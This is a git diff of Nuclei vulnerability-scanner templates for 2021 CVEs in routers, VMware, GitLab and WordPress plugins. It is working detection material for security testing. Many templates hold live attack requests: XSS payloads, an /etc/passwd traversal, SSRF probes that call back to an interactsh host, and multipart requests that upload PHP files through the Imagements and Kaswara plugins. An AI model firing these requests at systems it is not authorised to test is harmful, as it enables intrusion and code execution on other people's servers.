CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H - cvss-score: 9.1 + cvss-score: 9.10 cve-id: CVE-2021-21479 cwe-id: CWE-74 - tags: cve,cve2021,scimono,rce requests: - method: GET @@ -32,5 +29,3 @@ requests: - '"status" : "400"' part: body condition: and - -# Enhanced by mp on 2022/05/05 diff --git a/nuclei-templates/CVE-2021/CVE-2021-21745.yaml b/nuclei-templates/CVE-2021/CVE-2021-21745.yaml new file mode 100644 index 0000000000..c867bee9c3 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-21745.yaml @@ -0,0 +1,34 @@ +id: CVE-2021-21745 +info: + name: ZTE MF971R - Referer authentication bypass + author: gy741 + severity: medium + description: | + ZTE MF971R product has a Referer authentication bypass vulnerability. Without CSRF verification, an attackercould + use this vulnerability to perform illegal authorization operations by sending a request to the user to click. + reference: + - https://www.talosintelligence.com/vulnerability_reports/TALOS-2021-1317 + - https://nvd.nist.gov/vuln/detail/CVE-2021-21745 + - https://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1019764 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2021-21745 + cwe-id: CWE-287 + tags: zte,auth-bypass,cve,cve2021,router +requests: + - raw: + - | + GET /goform/goform_get_cmd_process?cmd=psw_fail_num_str HTTP/1.1 + Host: {{Hostname}} + Referer: http://interact.sh/127.0.0.1.html + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - 'psw_fail_num_str":"[0-9]' + - type: status + status: + - 200 +# Enhanced by mp on 2022/05/21 diff --git a/nuclei-templates/CVE-2021/CVE-2021-21799.yaml b/nuclei-templates/CVE-2021/CVE-2021-21799.yaml deleted file mode 100644 index 44d996dca0..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-21799.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2021-21799 -info: - name: Advantech R-SeeNet v 2.4.12 - Cross Site Scripting - author: arafatansari - severity: medium - description: | - Advantech R-SeeNet v 2.4.12 is vulnerable to Refleced Cross Site Scripting in the telnet_form.php script functionality. - reference: - - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1270 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21799 - - https://nvd.nist.gov/vuln/detail/CVE-2021-21799 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-21799 - cwe-id: CWE-79 - metadata: - shodan-query: http.html:"R-SeeNet" - verified: "true" - tags: cve,cve2021,xss,r-seenet -requests: - - method: GET - path: - - "{{BaseURL}}/php/telnet_form.php?hostname=%3C%2Ftitle%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Ctitle%3E" - matchers-condition: and - matchers: - - type: word - part: body - words: - - "Telnet " - - type: word - part: header - words: - - "text/html" - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2021/CVE-2021-21800.yaml b/nuclei-templates/CVE-2021/CVE-2021-21800.yaml deleted file mode 100644 index 0e8cd3402b..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-21800.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2021-21800 -info: - name: Advantech R-SeeNet v 2.4.12 - Cross Site Scripting - author: arafatansari - severity: medium - description: | - Advantech R-SeeNet v 2.4.12 is vulnerable to Refleced Cross Site Scripting in the ssh_form.php script functionality. - reference: - - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1271 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21800 - - https://nvd.nist.gov/vuln/detail/CVE-2021-21800 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-21800 - cwe-id: CWE-79 - metadata: - shodan-query: http.html:"R-SeeNet" - verified: "true" - tags: cve,cve2021,xss,r-seenet -requests: - - method: GET - path: - - "{{BaseURL}}/php/ssh_form.php?hostname=%3C/title%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Ctitle%3E" - matchers-condition: and - matchers: - - type: word - part: body - words: - - "SSH Session " - - type: word - part: header - words: - - "text/html" - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2021/cve-2021-21801.yaml b/nuclei-templates/CVE-2021/CVE-2021-21801.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-21801.yaml rename to nuclei-templates/CVE-2021/CVE-2021-21801.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-21802.yaml b/nuclei-templates/CVE-2021/CVE-2021-21802.yaml deleted file mode 100644 index df8b1fca2a..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-21802.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2021-21802 - -info: - name: Advantech R-SeeNet device_id parameter - Reflected Cross-Site Scripting (XSS) - author: gy741 - severity: medium - description: This vulnerability is present in device_graph_page.php script, which is a part of the Advantech R-SeeNet web applications. A specially crafted URL by an attacker and visited by a victim can lead to - arbitrary JavaScript code execution. - reference: - - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-21802 - cwe-id: CWE-79 - tags: cve,cve2021,rseenet,xss - -requests: - - method: GET - path: - - '{{BaseURL}}/php/device_graph_page.php?device_id=%22zlo%20onerror=alert(1)%20%22' - - matchers-condition: and - matchers: - - type: word - words: - - '"zlo onerror=alert(1) "' - - 'Device Status Graph' - part: body - condition: and - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2021/cve-2021-21803.yaml b/nuclei-templates/CVE-2021/CVE-2021-21803.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-21803.yaml rename to nuclei-templates/CVE-2021/CVE-2021-21803.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-21816.yaml b/nuclei-templates/CVE-2021/CVE-2021-21816.yaml deleted file mode 100644 index 2edea85ba4..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-21816.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2021-21816 - -info: - name: D-Link DIR-3040 - Syslog Information Disclosure - author: gy741 - severity: medium - description: An information disclosure vulnerability exists in the Syslog functionality of D-Link DIR-3040 1.13B03. A specially crafted network request can lead to the disclosure of sensitive information. An attacker - can send an HTTP request to trigger this vulnerability. - reference: - - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1281 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N - cvss-score: 4.3 - cve-id: CVE-2021-21816 - cwe-id: CWE-922 - tags: cve,cve2021,dlink,exposure,router,syslog - -requests: - - method: GET - path: - - "{{BaseURL}}/messages" - - matchers-condition: and - matchers: - - type: word - words: - - "syslog:" - - "admin" - - "/etc_ro/lighttpd/www" - part: body - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2021/CVE-2021-21973.yaml b/nuclei-templates/CVE-2021/CVE-2021-21973.yaml deleted file mode 100644 index ca41de8384..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-21973.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2021-21973 - -info: - name: VMware vCenter Unauthenticated SSRF - author: pdteam - severity: medium - description: The vSphere Client (HTML5) contains an SSRF (Server Side Request Forgery) vulnerability due to improper validation of URLs in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue by sending a POST request to vCenter Server plugin leading to information disclosure. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2). - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-21973 - - https://twitter.com/osama_hroot/status/1365586206982082560 - - https://twitter.com/bytehx343/status/1486582542807420928 - - https://www.vmware.com/security/advisories/VMSA-2021-0002.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cve-id: CVE-2021-21973 - cwe-id: CWE-918 - tags: cve,cve2021,vmware,ssrf,vcenter,oast - -requests: - - raw: - - | - GET /ui/vropspluginui/rest/services/getvcdetails HTTP/1.1 - Host: {{Hostname}} - Vcip: {{interactsh-url}} - Vcpassword: {{rand_base(6)}} - Vcusername: {{rand_base(6)}} - Reqresource: {{rand_base(6)}} - - matchers-condition: and - matchers: - - type: status - status: - - 500 - - - type: word - part: body - words: - - "The server sent HTTP status code 200" \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-21975.yaml b/nuclei-templates/CVE-2021/CVE-2021-21975.yaml index edf254408b..043597989c 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-21975.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-21975.yaml @@ -5,15 +5,13 @@ info: author: luci severity: high description: A malicious actor with network access to the vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative credentials or trigger Remote Code Execution using CVE-2021-21983. - reference: - - https://www.vmware.com/security/advisories/VMSA-2021-0004.html - - http://packetstormsecurity.com/files/162349/VMware-vRealize-Operations-Manager-Server-Side-Request-Forgery-Code-Execution.html + tags: cve,cve2021,ssrf,vmware,vrealize + reference: https://www.vmware.com/security/advisories/VMSA-2021-0004.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 + cvss-score: 7.50 cve-id: CVE-2021-21975 cwe-id: CWE-918 - tags: cve,cve2021,ssrf,vmware,vrealize requests: - raw: diff --git a/nuclei-templates/CVE-2021/CVE-2021-21985.yaml b/nuclei-templates/CVE-2021/CVE-2021-21985.yaml deleted file mode 100644 index 303389b8c8..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-21985.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: CVE-2021-21985 - -info: - name: VMware vSphere Client (HTML5) - Remote Code Execution - author: D0rkerDevil - severity: critical - description: | - The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. - reference: - - https://www.vmware.com/security/advisories/VMSA-2021-0010.html - - https://github.com/alt3kx/CVE-2021-21985_PoC - - https://nvd.nist.gov/vuln/detail/CVE-2021-21985 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-21985 - cwe-id: CWE-20 - tags: cve,cve2021,rce,vsphere,vmware - -requests: - - raw: - - | - POST /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData HTTP/1.1 - Host: {{Hostname}} - Accept: */* - Content-Type: application/json - - {"methodInput":[{"type":"ClusterComputeResource","value": null,"serverGuid": null}]} - - matchers: - - type: word - words: - - '{"result":{"isDisconnected":' - part: body - -# Enhanced by mp on 2022/05/05 diff --git a/nuclei-templates/CVE-2021/CVE-2021-22054.yaml b/nuclei-templates/CVE-2021/CVE-2021-22054.yaml new file mode 100644 index 0000000000..1599beb9ec --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-22054.yaml @@ -0,0 +1,32 @@ +id: CVE-2021-22054 +info: + name: VMWare Workspace ONE UEM - Server-Side Request Forgery + author: h1ei1 + severity: high + description: VMware Workspace ONE UEM console 20.0.8 prior to 20.0.8.37, 20.11.0 prior to 20.11.0.40, 21.2.0 prior to 21.2.0.27, and 21.5.0 prior to 21.5.0.37 contain a server-side request forgery vulnerability. This issue may allow a malicious actor with network access to UEM to send their requests without authentication and to gain access to sensitive information. + reference: + - https://blog.assetnote.io/2022/04/27/vmware-workspace-one-uem-ssrf/ + - https://www.vmware.com/security/advisories/VMSA-2021-0029.html + - https://nvd.nist.gov/vuln/detail/CVE-2021-22054 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2021-22054 + cwe-id: CWE-918 + metadata: + fofa-query: banner="/AirWatch/default.aspx" || header="/AirWatch/default.aspx" + tags: cve,cve2021,vmware,workspace,ssrf +requests: + - method: GET + path: + - "{{BaseURL}}/Catalog/BlobHandler.ashx?Url=YQB3AGUAdgAyADoAawB2ADAAOgB4AGwAawBiAEoAbwB5AGMAVwB0AFEAMwB6ADMAbABLADoARQBKAGYAYgBHAE4ATgBDADUARQBBAG0AZQBZAE4AUwBiAFoAVgBZAHYAZwBEAHYAdQBKAFgATQArAFUATQBkAGcAZAByAGMAMgByAEUAQwByAGIAcgBmAFQAVgB3AD0A" + matchers-condition: and + matchers: + - type: word + words: + - "Interactsh Server" + - type: status + status: + - 200 + +# Enhanced by mp on 2022/06/27 diff --git a/nuclei-templates/CVE-2021/CVE-2021-22145.yaml b/nuclei-templates/CVE-2021/CVE-2021-22145.yaml index 0be3468c75..16253fb2cf 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-22145.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-22145.yaml @@ -9,13 +9,12 @@ info: - https://github.com/jaeles-project/jaeles-signatures/blob/e9595197c80521d64e31b846808095dd07c407e9/cves/elasctic-memory-leak-cve-2021-22145.yaml - https://nvd.nist.gov/vuln/detail/CVE-2021-22145 - https://packetstormsecurity.com/files/163648/ElasticSearch-7.13.3-Memory-Disclosure.html - - https://discuss.elastic.co/t/elasticsearch-7-13-4-security-update/279177 + tags: cve,cve2021,elascticsearch,elasticsearch classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N - cvss-score: 6.5 + cvss-score: 6.50 cve-id: CVE-2021-22145 cwe-id: CWE-209 - tags: cve,cve2021,elasticsearch requests: - method: POST diff --git a/nuclei-templates/CVE-2021/CVE-2021-22205.yaml b/nuclei-templates/CVE-2021/CVE-2021-22205.yaml index 7932804e98..7da8674932 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-22205.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-22205.yaml @@ -1,10 +1,10 @@ id: CVE-2021-22205 info: - name: GitLab CE/EE - Remote Code Execution + name: Fingerprinting GitLab CE/EE Unauthenticated RCE using ExifTool - Passive Detection author: GitLab Red Team severity: critical - description: GitLab CE/EE starting from 11.9 does not properly validate image files that were passed to a file parser, resulting in a remote command execution vulnerability. This template attempts to passively identify vulnerable versions of GitLab without the need for an exploit by matching unique hashes for the application-.css file in the header for unauthenticated requests. Positive matches do not guarantee exploitability. Tooling to find relevant hashes based on the semantic version ranges specified in the CVE is linked in the references section below. + description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution. This template attempts to passively identify vulnerable versions of GitLab without the need for an exploit by matching unique hashes for the application-.css file in the header for unauthenticated requests. Positive matches do not guarantee exploitability. Tooling to find relevant hashes based on the semantic version ranges specified in the CVE is linked in the references section below. reference: - https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/red-team-research/cve-2021-22205-hash-generator - https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/red-team-operations/-/issues/196 @@ -14,12 +14,10 @@ info: - https://hackerone.com/reports/1154542 - https://nvd.nist.gov/vuln/detail/CVE-2021-22205 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H + cvss-score: 9.90 cve-id: CVE-2021-22205 cwe-id: CWE-20 - metadata: - shodan-query: http.title:"GitLab" tags: cve,cve2021,gitlab,rce requests: @@ -127,6 +125,4 @@ requests: - type: regex group: 1 regex: - - '(?:application-)(\S{64})(?:\.css)' - -# Enhanced by mp on 2022/05/05 + - '(?:application-)(\S{64})(?:\.css)' \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/cve-2021-22214.yaml b/nuclei-templates/CVE-2021/CVE-2021-22214.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-22214.yaml rename to nuclei-templates/CVE-2021/CVE-2021-22214.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-22873.yaml b/nuclei-templates/CVE-2021/CVE-2021-22873.yaml index fa16b73f67..f0ccf1f6b7 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-22873.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-22873.yaml @@ -5,17 +5,13 @@ info: author: pudsec severity: medium description: Revive Adserver before 5.1.0 is vulnerable to open redirects via the dest, oadest, and ct0 parameters of the lg.php and ck.php delivery scripts. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-22873 - - https://hackerone.com/reports/1081406 - - https://github.com/revive-adserver/revive-adserver/issues/1068 - - http://seclists.org/fulldisclosure/2021/Jan/60 + reference: https://nvd.nist.gov/vuln/detail/CVE-2021-22873 + tags: cve,cve2021,redirect classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2021-22873 cwe-id: CWE-601 - tags: cve,cve2021,redirect requests: - method: GET diff --git a/nuclei-templates/CVE-2021/CVE-2021-23241.yaml b/nuclei-templates/CVE-2021/CVE-2021-23241.yaml deleted file mode 100644 index 708a5cf378..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-23241.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2021-23241 - -info: - name: Mercury Router Web Server Directory Traversal - author: daffainfo - severity: medium - description: MERCUSYS Mercury X18G 1.0.5 devices allow Directory Traversal via ../ in conjunction with a loginLess or login.htm URI (for authentication bypass) to the web server, as demonstrated by the /loginLess/../../etc/passwd URI. - reference: - - https://github.com/BATTZION/MY_REQUEST/blob/master/Mercury%20Router%20Web%20Server%20Directory%20Traversal.md - - https://nvd.nist.gov/vuln/detail/CVE-2021-23241 - - https://www.mercusys.com/en/ - - https://www.mercurycom.com.cn/product-521-1.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cve-id: CVE-2021-23241 - cwe-id: CWE-22 - tags: cve,cve2021,iot,lfi,router - -requests: - - method: GET - path: - - "{{BaseURL}}/loginLess/../../etc/passwd" - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - part: body - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2021/cve-2021-24176.yaml b/nuclei-templates/CVE-2021/CVE-2021-24176.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-24176.yaml rename to nuclei-templates/CVE-2021/CVE-2021-24176.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-24226.yaml b/nuclei-templates/CVE-2021/CVE-2021-24226.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-24226.yaml rename to nuclei-templates/CVE-2021/CVE-2021-24226.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-24236.yaml b/nuclei-templates/CVE-2021/CVE-2021-24236.yaml new file mode 100644 index 0000000000..cc0cd70f13 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-24236.yaml @@ -0,0 +1,80 @@ +id: CVE-2021-24236 +info: + name: WordPress Plugin Imagements 1.2.5 - Unauthenticated Arbitrary File Upload + author: pussycat0x + severity: critical + description: | + The Imagements WordPress plugin through 1.2.5 allows images to be uploaded in comments, however only checks for the Content-Type in the request to forbid dangerous files. This allows unauthenticated attackers to upload arbitrary files by using a valid image Content-Type along with a PHP filename and code, leading to RCE. + reference: + - https://wpscan.com/vulnerability/8f24e74f-60e3-4100-9ab2-ec31b9c9cdea + - https://wordpress.org/plugins/imagements/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-24236 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24236 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-24236 + cwe-id: CWE-434 + tags: cve,cve2021,upload,rce,wordpress,wp-plugin,imagements,wp,unauth +variables: + php: "{{to_lower('{{randstr}}')}}.php" + post: "1" +requests: + - raw: + - | + POST /wp-comments-post.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIYl2Oz8ptq5OMtbU + + ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU + Content-Disposition: form-data; name="comment" + + {{randstr}} + ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU + Content-Disposition: form-data; name="author" + + {{randstr}} + ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU + Content-Disposition: form-data; name="email" + + {{randstr}}@email.com + ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU + Content-Disposition: form-data; name="url" + + + ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU + Content-Disposition: form-data; name="checkbox" + + yes + ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU + Content-Disposition: form-data; name="naam" + + {{randstr}} + ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU + Content-Disposition: form-data; name="image"; filename="{{php}}" + Content-Type: image/jpeg + + + + ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU + Content-Disposition: form-data; name="submit" + + Post Comment + ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU + Content-Disposition: form-data; name="comment_post_ID" + + {{post}} + ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU + Content-Disposition: form-data; name="comment_parent" + + 0 + ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU-- + - | + GET /wp-content/plugins/imagements/images/{{php}} HTTP/1.1 + Host: {{Hostname}} + req-condition: true + matchers: + - type: word + part: body_2 + words: + - "CVE-2021-24236" diff --git a/nuclei-templates/CVE-2021/CVE-2021-24237.yaml b/nuclei-templates/CVE-2021/CVE-2021-24237.yaml deleted file mode 100644 index b8f7605ff6..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-24237.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: CVE-2021-24237 - -info: - name: Realteo WordPress Plugin <= 1.2.3 - Unauthenticated Reflected XSS - author: 0x_Akoko - severity: medium - description: The plugin, used by the Findeo Theme, did not properly sanitise the keyword_search, search_radius. - reference: - - https://wpscan.com/vulnerability/087b27c4-289e-410f-af74-828a608a4e1e - - https://m0ze.ru/vulnerability/[2021-03-20]-[WordPress]-[CWE-79]-Realteo-WordPress-Plugin-v1.2.3.txt - - https://m0ze.ru/vulnerability/[2021-03-20]-[WordPress]-[CWE-79]-Findeo-WordPress-Theme-v1.3.0.txt - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-24237 - cwe-id: CWE-79 - tags: cve,cve2021,realteo,xss,wordpress,plugin - -requests: - - method: GET - path: - - '{{BaseURL}}/properties/?keyword_search=--!%3E%22%20autofocus%20onfocus%3Dalert(/{{randstr}}/)%3B%2F%2F' - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - "autofocus onfocus=alert(/{{randstr}}/);//" - - "Nothing found" - part: body - condition: and - - - type: word - words: - - "text/html" - part: header diff --git a/nuclei-templates/CVE-2021/CVE-2021-24275.yaml b/nuclei-templates/CVE-2021/CVE-2021-24275.yaml deleted file mode 100644 index 60a5aff236..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-24275.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2021-24275 - -info: - name: Popup by Supsystic < 1.10.5 - Reflected Cross-Site scripting (XSS) - author: dhiyaneshDK - severity: medium - description: The Popup by Supsystic WordPress plugin before 1.10.5 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue. - reference: - - https://wpscan.com/vulnerability/efdc76e0-c14a-4baf-af70-9d381107308f - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24275 - - http://packetstormsecurity.com/files/164311/WordPress-Popup-1.10.4-Cross-Site-Scripting.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-24275 - cwe-id: CWE-79 - tags: wordpress,cve,cve2021,wp-plugin - -requests: - - method: GET - path: - - '{{BaseURL}}/wp-admin/admin.php?page=popup-wp-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - - matchers-condition: and - matchers: - - type: word - words: - - '' - condition: and - - - type: status - status: - - 200 - - - type: word - words: - - "text/html" - part: header diff --git a/nuclei-templates/CVE-2021/CVE-2021-24284.yaml b/nuclei-templates/CVE-2021/CVE-2021-24284.yaml new file mode 100644 index 0000000000..f2e969c7a6 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-24284.yaml @@ -0,0 +1,62 @@ +id: CVE-2021-24284 +info: + name: WordPress Kaswara Modern VC Addons - File Upload RCE + author: lamscun,pussycat0x,pdteam + severity: critical + description: | + The Kaswara Modern VC Addons WordPress plugin through 3.0.1 allows unauthenticated arbitrary file upload via the 'uploadFontIcon' AJAX action. The supplied zipfile being unzipped in the wp-content/uploads/kaswara/fonts_icon directory with no checks for malicious files such as PHP. + reference: + - https://wpscan.com/vulnerability/8d66e338-a88f-4610-8d12-43e8be2da8c5 + - https://github.com/advisories/GHSA-wqvg-8q49-hjc7 + - https://www.wordfence.com/blog/2021/04/psa-remove-kaswara-modern-wpbakery-page-builder-addons-plugin-immediately/ + - https://www.waltermairena.net/en/2021/04/25/0-day-vulnerability-in-the-plugin-kaswara-modern-vc-addons-plugin-what-can-i-do/ + - https://lifeinhex.com/kaswara-exploit-or-how-much-wordfence-cares-about-user-security/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-24284 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-24284 + cwe-id: CWE-434 + tags: cve,cve2021,wordpress,wp-plugin,rce,wp,intrusive,unauth,fileupload +variables: + zip_file: "{{to_lower(rand_text_alpha(6))}}" + php_file: "{{to_lower(rand_text_alpha(2))}}.php" + php_cmd: "" +requests: + - raw: + - | + POST /wp-admin/admin-ajax.php?action=uploadFontIcon HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=------------------------d3be34324392a708 + + --------------------------d3be34324392a708 + Content-Disposition: form-data; name="fonticonzipfile"; filename="{{zip_file}}.zip" + Content-Type: application/octet-stream + + {{hex_decode('504B03040A0000000000FA73F454B2333E07140000001400000006001C00')}}{{php_file}}{{hex_decode('555409000366CBD76267CBD76275780B000104F50100000414000000')}}{{php_cmd}}{{hex_decode('0A504B01021E030A00000000002978F454E49BC1591300000013000000060018000000000001000000A48100000000')}}{{php_file}}{{hex_decode('555405000366CBD76275780B000104F50100000414000000504B050600000000010001004C000000530000000000')}} + --------------------------d3be34324392a708 + Content-Disposition: form-data; name="fontsetname" + + {{zip_file}} + --------------------------d3be34324392a708 + Content-Disposition: form-data; name="action" + + uploadFontIcon + --------------------------d3be34324392a708-- + - | + GET /wp-content/uploads/kaswara/fonts_icon/{{zip_file}}/{{php_file}} HTTP/1.1 + Host: {{Hostname}} + req-condition: true + matchers-condition: and + matchers: + - type: word + part: body_1 + words: + - "wp-content/uploads/kaswara/fonts_icon/{{zip_file}}/style.css" + - type: word + part: body_2 + words: + - "phpinfo()" + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2021/cve-2021-24285.yaml b/nuclei-templates/CVE-2021/CVE-2021-24285.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-24285.yaml rename to nuclei-templates/CVE-2021/CVE-2021-24285.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-24298.yaml b/nuclei-templates/CVE-2021/CVE-2021-24298.yaml deleted file mode 100644 index a476389cb0..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-24298.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2021-24298 - -info: - name: Simple Giveaways < 2.36.2 - Reflected Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - description: The method and share GET parameters of the Giveaway pages were not sanitised, validated or escaped before being output back in the pages, thus leading to reflected XSS - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-24298 - - https://codevigilant.com/disclosure/2021/wp-plugin-giveasap-xss/ - - https://wpscan.com/vulnerability/30aebded-3eb3-4dda-90b5-12de5e622c91 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-24298 - cwe-id: CWE-79 - tags: cve,cve2021,wordpress,xss,wp-plugin - -requests: - - method: GET - path: - - '{{BaseURL}}/giveaway/mygiveaways/?share=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 diff --git 